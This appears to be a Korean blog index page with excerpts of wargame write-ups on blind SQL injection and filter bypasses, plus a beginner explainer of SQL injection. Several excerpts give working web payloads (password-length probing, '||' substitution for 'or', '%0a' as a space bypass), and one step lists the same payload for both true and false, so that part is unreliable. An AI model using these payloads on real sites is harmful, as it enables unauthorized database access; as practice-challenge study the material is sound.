살아가는 이야기

Blind SQL injection 사용 Blind SQL injection --> https://owasp.org/www-community/attacks/Blind_SQL_Injection 1. 참, 거짓 확인 -참: ?pw=1'||'1'='1 --> hello guest 작동 O -거짓: ?pw=1'||'1'='1 --> hello guest 작동 X 2. pw길이 확인 ?pw=1'||length(pw)='17 --> hello guest 작동 O --> 참 pw는 17자리이다. 그런데 ?pw=1'||length(pw)='8 --> hello admin 작동 O hello guest가 뜰 때의 pw는 guest의 pw이고, hello admin이 뜰 때의 pw는 admin의 pw인 것 같다. 우리는 ..

이전에 풀었던 wolfman 문제와 비슷하다. --> https://sh1256.tistory.com/60 1. 필터링 prob, _, .(마침표), \, or, land 2. 1'or id='admin 값 넣기 3. or 대신에 || 사용 (and 대신에는 && 사용 가능) 결과: URL 뒤에 ?pw=1%27||id=%27admin 붙이기

?pw=1%27or%0aid=%27admin 1. select id from prob_wolfman where id='guest' and pw='1'or id='admin' 2. 공백은 %0a로 우회 3. 결과 --> URL 뒤에 ?pw=1%27or%0aid=%27admin 입력

SQL injection(SQL 인젝션 공격) SQL, 컴퓨터 보안, 해킹 기법, SQL 인젝션 공격이란 무엇일까요? 나무위키에 따르면, 코드 인젝션의 한 기법으로 클라이언트의 입력값을 조작하여 서버의 데이터베이스를 공격할 수 있는 공격방식을 말합니다. 출처: https://namu.wiki/w/SQL%20injection 이렇게 말로 풀어 쓰니 어려워 보입니다. 예를 하나 들어서 설명해 보죠!! (생각보다 쉬우니 따라와 보세요!!) 흔하디 흔한 SQL 구문을 하나 가져왔습니다. select data from table1 where id='id입력값' and pw='pw입력값' 자 이렇게 table1이 있고, table1과 연결되있는 웹사이트가 하나 있다고 해봅시다. 웹사이트에 ID와 PW를 입력하면 d..